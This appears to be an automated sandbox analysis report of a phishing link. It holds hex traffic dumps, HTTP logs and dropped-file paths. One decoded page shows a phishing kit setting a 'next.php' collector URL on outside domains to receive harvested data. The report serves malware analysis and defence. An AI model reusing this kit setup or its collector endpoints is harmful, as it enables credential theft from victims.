2022-01-28 16:24:59 UTC	1173	IN	Data Raw: 1d 06 fa 34 76 f8 9c 4d 30 d1 85 11 74 f8 20 e8 da 1a fc 4e 3d 3e 8c bf fa 9e b9 e7 2c a0 8a a0 c3 07 41 97 36 39 ca 72 cb d8 a9 fc 11 38 26 ba 3e 82 0e 1f 04 5d 5a 87 43 ed 45 fc d7 f1 fc 80 89 ae 8e a0 c3 07 41 57 36 b9 cd 72 6f 87 d8 e9 53 76 31 be 0c 68 22 e8 f0 41 d0 95 9d 66 bd d3 58 d3 f5 6e 19 26 ba 2e 82 0e 1f 04 5d d8 61 83 81 9e d7 b1 a6 e1 9f ea 98 e8 e2 08 3a 7c 10 74 61 5f b2 de 3c 9e 72 dc e5 3e 77 26 ba 2c 82 0e 1f 04 5d d7 e5 45 d6 3b 89 27 dd 64 17 4c 74 51 04 1d 3e 08 ba ae 59 d6 7b f4 12 7a c7 9b e6 99 e8 da 08 3a 7c 10 74 59 2d 06 fa 9b 7d 1f b2 cf 99 fb 05 13 5d 12 41 87 0f 82 2e eb 20 1b f8 1e 7b cc b3 0d 26 ba 24 82 0e 1f 04 5d d5 6a 9c f5 de 8f 62 8f 69 b6 c1 44 97 44 d0 e1 83 a0 ff 66 ef 5e 96 d2 88 a2 28 0c bf 4b 46 7b 27 46 34 Data Ascii: 4vM0t N=>,A69r8&>]ZCEAW6roSv1h"AfXn&.]a:\|ta_<r>w&,]E;'dLtQ>Y{z:\|tY-}]A. {&$]jbiDDf^(KF{'F4
2022-01-28 16:24:59 UTC	1174	IN	Data Raw: 18 05 41 af 82 a0 23 8a f0 f1 b1 d5 a2 cf bf 8b 89 8e 31 10 f4 2a 08 3a b2 0c 07 57 f1 de 1a 14 38 16 c7 44 47 26 82 5e 05 41 47 10 e5 21 fb da 42 1d 5d 0d 13 1d 89 08 7a 15 04 1d 49 d6 3a 03 7d b7 b1 50 bf 5d 0e 13 1d 79 08 7a 15 04 1d 31 94 07 fa d2 da 14 38 16 c7 44 47 1e 82 5e 05 41 47 08 e5 81 de fc cc 9a f2 87 95 47 5b 03 92 10 f4 2a 08 3a fe b3 77 37 29 4e 45 51 14 85 87 62 f7 1c f1 af a4 34 26 fa 4c 45 2d 11 31 a6 9e 06 2b 50 ce 7f 1c f6 c4 8e 0d 73 cf 7e ec 63 ad 6f 06 81 c0 62 c3 bd f7 95 70 6e de 1c 83 3a 1c 8b 63 a2 43 86 a0 77 41 d0 51 c1 79 a0 57 dc 59 b3 ff 88 2a 13 1d 3a 04 bd 0b 82 0e 89 6f 69 63 17 f5 ee d2 0e 13 1d 2a 04 bd 0b 82 8e 02 ce 03 3d 5f 84 c0 97 b4 c3 44 87 08 41 ef 82 a0 a3 80 f3 40 7f b7 09 81 db b4 c3 44 87 08 41 ef 82 a0 Data Ascii: A#1:W8DG&^AG!B]zI:}P]yz18DG^AGG[:w7)NEQb4&LE-1+Ps~cobpn:cCwAQyWY:oic=_DA@DA
2022-01-28 16:24:59 UTC	1176	IN	Data Raw: 60 31 d8 16 51 13 15 42 e1 fd 5f 83 0b 12 ee e8 cc 39 e5 62 ed b0 7e 8f d0 74 66 cd 3f cd f4 74 ba 9c 25 ca 2a 08 b6 c9 f4 10 52 2f 83 5e 85 41 d7 38 f4 81 be 0c 86 65 22 39 d1 d5 cf a0 57 f1 06 82 fe ce a0 bf 02 fc 40 a7 fc 4a 7c 90 4c 4e 74 75 33 e8 55 18 74 f5 f9 9d 28 eb 79 30 cc bf 27 92 13 5d dd 0c 7a 15 06 5d 63 e0 07 fa 24 28 26 c9 e4 44 57 2f 83 5e 85 41 d7 18 f4 81 7e 7c 12 14 27 d0 37 d7 0e 9d e8 ea 64 d0 ab 30 e8 ea b1 85 0d f4 69 70 4c 93 c9 89 ae 4e 06 bd 0a 83 ae 11 e8 03 7d 76 19 1c b4 5f 23 9c e8 da 93 41 af c2 a0 6b 18 be 59 ef 83 84 7a 51 39 d1 d5 c7 a0 57 41 bd f7 18 74 b4 f3 64 d9 04 c9 26 99 9c e8 ea 63 d0 ab 30 e8 6a b7 82 0d f4 bf ac 52 7d f9 96 4c ac e7 1e d5 65 d0 a1 0c ba 06 e1 07 fa 59 b0 9c 25 93 13 5d 5d 0c 7a 15 06 5d 43 f0 Data Ascii: `1QB_9b~tf?t%*R/^A8e"9W@J\|LNtu3Ut(y0']z]c$(&DW/^A~\|'7d0ipLN}v_#AkYzQ9WAtd&c0jR}LeY%]]z]C
2022-01-28 16:24:59 UTC	1177	IN	Data Raw: c2 9a e0 dd f2 5b e3 75 00 3d 08 ba 0b 82 8e 4e 47 8a 03 7d 15 de 2e 14 8f 25 30 d1 b1 0f 41 77 41 d0 d1 69 95 7a fc cf 62 2b fe d9 83 89 8e 7d 08 ba 0b 82 8e 7b 1e f7 77 bf 0c 77 eb 71 ca f2 bc c5 0e 43 20 e8 2e 08 3a ee 59 0c f4 3c 0c 7b 9f 53 d6 78 1e 40 27 82 ee 82 a0 a3 c3 5c 71 a0 bf b5 7d 8d fb 1f 37 a9 8b 89 8e 1e 04 dd 05 41 47 84 c7 5b 4a ef a2 02 b7 29 6b c2 44 47 37 82 ee 82 a0 23 3c 06 fa 79 15 a7 b6 5e a4 2e 26 3a ba 11 74 17 04 1d 7f 3b 48 41 d3 a8 c1 1b c1 2b 69 99 e8 d8 8d a0 bb 20 e8 30 39 8b 7d 1a 55 50 7c a3 6e 2d cf f9 3b 5a 1c 3a ba ce 62 4e 0e f1 ef 5e a5 34 82 3e 04 8b 81 7e 7d 19 55 38 92 fc b4 c4 44 7f 2a c7 09 b4 82 a0 3f 81 d7 92 c9 f9 12 95 50 fe 0d ce 44 df a7 a9 6f 07 80 a0 db fb 91 82 c6 d5 fc 6b 6d 91 ba 26 d5 7c 95 6d 10 Data Ascii: [u=NG}.%0AwAizb+}{wwqC .:Y<{Sx@'\q}7AG[J)kDG7#<y^.&:t;HA+i 09}UP\|n-;Z:bN^4>~}U8D*?PDokm&\|m
2022-01-28 16:24:59 UTC	1178	IN	Data Raw: 0e 0c 13 74 3a 04 1d 18 26 e8 0f f6 ea a5 84 81 20 88 02 a0 89 88 c8 c0 92 0f 71 11 03 f1 ef 24 0e fa b0 b0 30 dd af ca 44 91 43 e8 c0 60 42 27 87 d0 81 c1 84 4e 0e a1 03 83 09 9d 1c 42 07 06 13 3a 39 84 0e 0c 26 74 72 08 1d 18 4c e8 e4 10 3a 30 98 d0 c9 21 74 60 30 a1 93 43 e8 c0 60 42 27 87 d0 81 c1 84 4e 0e a1 03 83 09 9d 1c 42 07 06 13 3a 39 84 0e 0c 26 74 72 08 1d 18 ec 77 74 f4 5e 97 f9 1c 9c f7 5d 5b 13 3a c0 66 5e eb 32 cf 3b e7 3d d6 d6 84 0e b0 19 a1 6f 4a e8 00 14 84 de 85 d0 01 28 08 bd 0b a1 03 50 10 7a 17 42 07 a0 20 f4 2e 84 0e 40 41 e8 5d 08 1d 80 82 d0 bb 10 3a 00 05 a1 77 21 74 00 0a 42 ef 42 e8 00 14 84 de 45 40 e8 37 a1 03 9c 26 f4 2e 84 0e 40 41 e8 5d 08 1d 80 82 d0 bb 10 3a 00 05 a1 77 21 74 00 0a 42 ef 42 e8 f0 67 af 8e 69 00 00 00 Data Ascii: t:& q$0DC`B'NB:9&trL:0!t`0C`B'NB:9&trwt^][:f^2;=oJ(PzB .@A]:w!tBBE@7&.@A]:w!tBBgi
2022-01-28 16:24:59 UTC	1180	IN	Data Raw: 00 00 00 30 0c f2 b7 be c7 57 12 d1 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 81 63 42 a7 43 e8 c0 31 a1 d3 21 74 e0 98 d0 e9 10 3a 70 4c e8 74 08 1d 38 26 74 3a 84 0e 1c 13 3a 1d 42 07 8e 09 9d 0e a1 03 c7 84 4e 87 d0 19 7b 75 20 00 00 00 c0 30 c8 df fa 1e 7b 49 04 61 42 e7 87 d0 81 30 a1 f3 43 e8 40 98 d0 f9 21 74 20 4c e8 fc 10 3a 10 26 74 7e 08 1d 08 13 3a 3f 84 0e 84 09 9d 1f 42 07 c2 84 ce 0f a1 03 61 42 Data Ascii: 0W!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BNcBC1!t:pLt8&t::BN{u 0{IaB0C@!t L:&t~:?BaB
2022-01-28 16:24:59 UTC	1181	IN	Data Raw: 84 0e c0 97 fd 7a 5d 49 20 0a 03 28 fa 65 d3 68 de 72 c4 bb 8e 32 28 f6 fe 6f 58 91 f4 27 a2 d0 a4 ce 71 ad 97 d8 6c 92 36 2e 23 42 d0 01 20 61 fb fe 32 42 d0 01 20 65 d3 f6 26 42 d0 01 20 61 8b de 32 22 04 1d 00 d2 35 ed 15 c3 08 41 07 80 64 cd 26 75 2b 5e 09 3a 00 24 aa 7b 78 5c 0e 23 42 d0 01 20 4d a3 e9 53 5d c5 1b 41 07 80 04 8d 9a c1 b6 f3 3e e6 82 0e 00 c9 d9 37 87 dd b1 5c 9d 52 2e e8 00 90 90 59 33 1f ec b6 75 59 6d e2 44 d0 01 e0 bf eb 2e 9a f9 78 d2 df f5 1e eb 4e 59 54 ad e7 f8 20 e8 c0 0d e8 95 3f 57 fc 95 ea b3 e2 52 eb f2 52 9d 5f d3 be 8a 87 ab 39 b6 cf d1 39 4b f9 ad 75 51 ad 5a f7 5f e7 5b d0 81 db 70 17 80 a0 03 c9 13 74 10 74 20 03 82 0e 82 0e 64 40 d0 41 d0 81 0c 08 3a 08 3a 90 01 41 07 41 07 32 20 e8 20 e8 40 06 04 1d 04 1d c8 80 a0 Data Ascii: z]I (ehr2(oX'ql6.#B a2B e&B a2"5Ad&u+^:${x\#B MS]A>7\R.Y3uYmD.xNYT ?WRR_99KuQZ_[ptt d@A::AA2 @
2022-01-28 16:24:59 UTC	1182	IN	Data Raw: c8 d0 6e fa bf f9 61 00 41 07 a8 df 65 5a 5f cd 06 10 74 80 fa 75 53 77 5e 10 74 80 0c ed 64 fb bf 30 ad 23 e8 00 09 4e cb 7e ef d6 3a 82 0e 10 c1 b4 8e a0 03 c4 f0 20 3c 82 0e 90 c2 5f eb 08 3a 40 0c 0f c2 ff 36 41 07 88 d2 ac fd de f6 9b 04 1d 20 cf 99 bd 3b 48 51 18 88 a2 28 0a dd e2 40 41 71 24 48 04 41 d0 ec 7f 85 22 8e 44 c4 04 1d 54 bd 7f ce 26 2e 14 79 3f e6 6d 05 09 3a 40 2a 97 63 4b 11 74 80 6c 7e ca 5a 84 a0 03 54 60 de 16 4f d0 01 ca d8 1c 96 e6 6d b1 04 1d a0 98 eb ee b4 76 39 36 8f a0 03 94 64 de 96 46 d0 01 ea 32 6f 0b 22 e8 00 d5 99 b7 45 10 74 00 cc db 02 08 3a 00 e6 6d 01 04 1d 00 f3 b6 00 82 0e 80 79 5b 00 41 07 c0 bc 2d 80 a0 03 30 61 de e6 0d be 75 82 0e c0 8c 79 9b 37 f8 56 09 3a 00 e6 6d 01 04 1d 80 f9 fe 96 17 6f f0 6d 11 74 00 be Data Ascii: naAeZ_tuSw^td0#N~: <_:@6A ;HQ(@Aq$HA"DT&.y?m:@*cKtl~ZT`Omv96dF2o"Et:my[A-0auy7V:momt

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:25:00 UTC	1183	OUT	GET /images/sampledata/hack-run.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: shopget24.com Connection: Keep-Alive
2022-01-28 16:25:00 UTC	1183	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/7.2.34 content-type: image/png cache-control: public, max-age=604800 expires: Fri, 04 Feb 2022 16:25:00 GMT content-length: 0 date: Fri, 28 Jan 2022 16:25:00 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic

C:\Users\user\AppData\Local\Google\Chrome\User Data\05d8a8e2-4681-4304-95f7-dd3ddc9d524f.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\4b75347a-1ca5-4f99-a839-442455eb5227.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\51904d78-7904-470d-a584-2ff17794c279.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\560f4fb4-cb9d-4217-9826-18d77e808f44.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\56ea67a1-d403-4472-826c-0164654dd6ac.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\7d20dec3-eee7-48e7-af24-09b2437acab0.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\960af746-fe8d-401b-8b8a-6bbafff54057.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\5173a041-abc9-496c-9de9-8d9fece84bb7.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\6c0ee288-2543-4cb2-8708-dbf4266f607c.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\82b7dfda-23a3-47e7-b725-f933c56cc6ef.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9001b829-d207-4cc3-a79a-91b91f8c2fb2.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9648ab04-24f1-4b32-8899-d79643600861.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\972260c3-c6f7-4e42-90fc-4342130250f6.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9d407e21-b635-4aa6-83dd-8f0faae02273.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old (copy)

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old.s (copy)

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log

Windows Analysis Report
https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:41 UTC	755	OUT	GET /api/proxy?v=3 HTTP/1.1 Host: skyapi.onedrive.live.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://onedrive.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F
2022-01-28 16:24:41 UTC	755	IN	HTTP/1.1 200 OK Cache-Control: public Content-Length: 448 Content-Type: text/html Expires: Sat, 28 Jan 2023 16:24:41 GMT P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-MSNSERVER: AM3PPF87191BCE1 Strict-Transport-Security: max-age=31536000; includeSubDomains MS-CV: d14fFrGKukavQ10TeG0u0g.0 X-AsmVersion: UNKNOWN; 19.830.111.2003 Date: Fri, 28 Jan 2022 16:24:40 GMT Connection: close
2022-01-28 16:24:41 UTC	756	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 61 73 70 6e 65 74 63 64 6e 2e 63 6f 6d 2f 61 6a 61 78 2f 6a 51 75 65 72 79 2f 6a 71 75 65 72 79 2d 31 2e 37 2e 32 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 3d 22 6c 69 76 65 2e 63 6f 6d 22 3b 20 74 72 79 20 7b 20 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 5b 22 6f 6e 53 6b 79 Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"></script><script type="text/javascript">document.domain="live.com"; try { (window.parent["onSky

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:44 UTC	756	OUT	GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1643419484127 HTTP/1.1 Host: storage.live.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://onenote.officeapps.live.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F; BP=l=SDX.Skydrive&FR=&ST=; MUID=3D609D24E268600A10D48C1EE668644C
2022-01-28 16:24:44 UTC	757	IN	HTTP/1.1 302 Found Content-Length: 0 Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1643387084&rver=7.3.6962.0&wp=MBI_SSL&wreply=https:%2F%2Fstorage.live.com%2Fstorageservice%2Fpassport%2Fauth.aspx%3Fsru%3Dhttps:%252f%252fstorage.live.com%252fmydata%252fmyprofile%252fexpressionprofile%252fprofilephoto:UserTileStatic%252cUserTileSmall%252fMeControlMediumUserTile&lc=1033&id=63539 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-MSNSERVER: AM3PPF7DA8A3CFB Strict-Transport-Security: max-age=31536000; includeSubDomains MS-CV: 6iw+k/tmDkW2bmKdiZf5hw.0 X-QosStats: {"ApiId":0,"ResultType":2,"SourcePropertyId":0,"TargetPropertyId":42} X-ThrowSite: 4212.9205 X-ClientErrorCode: PassportAuthFail X-ErrorCodeChain: Unauthenticated X-AsmVersion: UNKNOWN; 19.830.111.2003 Date: Fri, 28 Jan 2022 16:24:44 GMT Connection: close

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:56 UTC	758	OUT	GET /freedo.html HTTP/1.1 Host: magenta-flicker-surprise.glitch.me Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:56 UTC	758	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 16:24:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 144847 Connection: close x-amz-id-2: WlrrmSFdZ55f9vDsUsRDlFMmQQo3onRIYd52KrQ0dqMKre8jm+WJ8iR8hoOtOvlnaMabsVeguPM= x-amz-request-id: X1MN9N7HP0Q22JHW last-modified: Fri, 28 Jan 2022 16:02:03 GMT etag: "22ed47c1a2a7f9dbdbf969f6c77553d1" cache-control: no-cache x-amz-version-id: .9DzjSDJSgihAlDSPSZrIv5k9xW7WyFq accept-ranges: bytes server: AmazonS3
2022-01-28 16:24:56 UTC	759	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 70 68 70 75 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 61 6c 72 61 68 65 65 66 67 72 6f 75 70 2e 63 6f 6d 2f 70 72 6f 66 73 2f 61 38 75 2f 6e 65 78 74 2e 70 68 70 22 20 3b 20 2f 2f 20 70 75 74 20 79 6f 75 72 20 6e 65 78 74 2e 70 68 70 20 6c 69 6e 6b 20 45 58 50 28 68 74 74 70 73 3a 2f 2f 73 63 72 65 77 63 61 70 2e 63 6f 6d 2e 61 75 2f 7a 6f 6e 65 62 69 7a 2f 6a 73 2f 61 38 75 2f 6e 65 78 74 2e 70 68 70 29 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f Data Ascii: <!doctype html><html lang="en"><head><script>window.phpurl = "https://alraheefgroup.com/profs/a8u/next.php" ; // put your next.php link EXP(https://screwcap.com.au/zonebiz/js/a8u/next.php)</script> <script src="https://ajax.googleapis.com/ajax/
2022-01-28 16:24:56 UTC	768	IN	Data Raw: 41 41 41 41 41 41 6f 53 57 41 41 41 42 42 55 73 53 41 41 41 43 70 4a 49 41 41 4b 48 49 7a 6c 70 79 6e 53 75 52 78 48 61 62 53 39 35 76 41 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 48 6e 6e 6a 41 71 61 48 51 65 61 44 6b 4f 38 35 79 53 44 57 4f 67 6f 6e 4b 31 47 70 39 47 65 62 6d 63 68 63 67 39 42 65 4d 78 72 6f 50 4f 4f 73 76 57 68 7a 52 30 47 4f 56 4e 45 63 70 76 58 65 65 74 48 69 6e 48 46 69 32 6e 51 63 52 31 6c 49 48 70 56 63 38 6b 35 7a 6f 4e 6a 49 67 6e 54 33 4d 76 45 4f 4d 32 4e 6a 53 4e 7a 74 50 47 4b 72 59 79 31 4e 52 48 49 64 4a 71 64 4a 33 6e 6b 78 79 47 46 64 52 30 48 75 48 59 53 53 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 44 4d 6b 75 53 41 41 43 43 43 68 63 6b 6b 41 41 67 46 43 78 4a 49 41 49 4d 7a 69 5a 79 30 35 54 Data Ascii: AAAAAAoSWAAABBUsSAAACpJIAAKHIzlpynSuRxHabS95vAkAAAAAAAAAAAAAAAAAgHnnjAqaHQeaDkO85ySDWOgonK1Gp9Gebmchcg9BeMxroPOOsvWhzR0GOVNEcpvXeetHinHFi2nQcR1lIHpVc8k5zoNjIgnT3MvEOM2NjSNztPGKrYy1NRHIdJqdJ3nkxyGFdR0HuHYSSAAAAAAAAAAAAAAAAAQDMkuSAACCChckkAAgFCxJIAIMziZy05T
2022-01-28 16:24:56 UTC	777	IN	Data Raw: 50 57 4b 6e 6c 6e 63 64 4a 42 77 48 7a 69 39 7a 50 76 4c 75 51 63 4a 6d 65 6d 44 6c 50 41 4f 49 36 44 36 4d 36 7a 49 38 77 39 51 6d 50 48 50 47 6f 59 6e 6f 6e 30 52 73 65 55 65 55 5a 6c 6a 56 50 51 50 54 58 51 6b 41 41 41 41 41 41 45 45 67 41 48 6d 6d 4a 38 75 65 59 51 53 51 51 41 44 33 6a 36 49 41 41 67 6b 46 69 53 53 51 5a 47 78 67 64 4a 32 6b 67 41 41 46 53 68 63 6b 6b 41 41 67 67 71 58 4a 41 41 42 51 38 37 54 4c 57 59 47 62 79 6d 52 6f 64 47 62 75 58 6a 6d 4e 71 78 50 4a 6c 78 4f 62 55 37 63 75 57 75 6f 35 7a 71 4f 6b 34 53 44 6d 4a 50 51 41 4f 6f 7a 4f 55 67 6f 43 35 36 4a 36 4a 79 6d 4a 33 6e 41 63 35 73 5a 6b 6d 78 67 55 4d 7a 51 33 50 52 4f 41 31 4f 77 71 63 42 7a 67 36 44 79 7a 45 39 4b 4a 4e 71 39 41 73 65 65 61 6e 57 43 44 69 4f 6f 30 42 78 48 Data Ascii: PWKnlncdJBwHzi9zPvLuQcJmemDlPAOI6D6M6zI8w9QmPHPGoYnon0RseUeUZljVPQPTXQkAAAAAAEEgAHmmJ8ueYQSQQAD3j6IAAgkFiSSQZGxgdJ2kgAAFShckkAAggqXJAABQ87TLWYGbymRodGbuXjmNqxPJlxObU7cuWuo5zqOk4SDmJPQAOozOUgoC56J6JymJ3nAc5sZkmxgUMzQ3PROA1OwqcBzg6DyzE9KJNq9AseeanWCDiOo0BxH
2022-01-28 16:24:56 UTC	784	IN	Data Raw: 71 62 73 66 51 52 62 59 75 50 6d 74 47 36 61 68 76 52 63 50 33 4a 46 76 48 65 74 6c 42 77 50 38 54 77 51 46 48 46 69 49 46 49 4b 70 43 49 46 43 4b 67 41 44 50 32 4e 68 77 64 4e 6c 47 49 4d 6b 6d 67 4e 31 6d 4a 57 52 47 70 32 6e 43 4c 4d 57 58 47 30 61 6c 54 31 4f 6b 7a 4e 47 44 63 6d 47 41 55 52 44 30 79 73 55 6d 67 65 67 4c 55 55 51 48 44 46 63 65 63 54 79 54 74 2f 52 62 6d 38 37 7a 6d 67 34 2b 58 38 39 64 6f 4a 51 39 4a 44 2b 61 79 5a 4a 4e 79 6c 44 44 59 63 58 2b 51 79 62 72 4e 51 61 4b 4e 6b 55 4e 42 32 76 49 79 52 4c 39 6a 59 35 4b 75 33 34 78 5a 67 7a 4f 30 59 74 6b 41 6d 5a 6d 5a 6d 5a 48 46 45 79 70 6b 77 4d 48 46 4d 66 44 36 42 57 72 59 71 76 6c 72 70 44 38 4b 34 35 46 34 4a 31 41 58 38 67 55 63 50 6a 73 56 30 31 6a 46 57 38 73 71 59 41 4b 35 6c Data Ascii: qbsfQRbYuPmtG6ahvRcP3JFvHetlBwP8TwQFHFiIFIKpCIFCKgADP2NhwdNlGIMkmgN1mJWRGp2nCLMWXG0alT1OkzNGDcmGAURD0ysUmgegLUUQHDFcecTyTt/Rbm87zmg4+X89doJQ9JD+ayZJNylDDYcX+QybrNQaKNkUNB2vIyRL9jY5Ku34xZgzO0YtkAmZmZmZHFEypkwMHFMfD6BWrYqvlrpD8K45F4J1AX8gUcPjsV01jFW8sqYAK5l
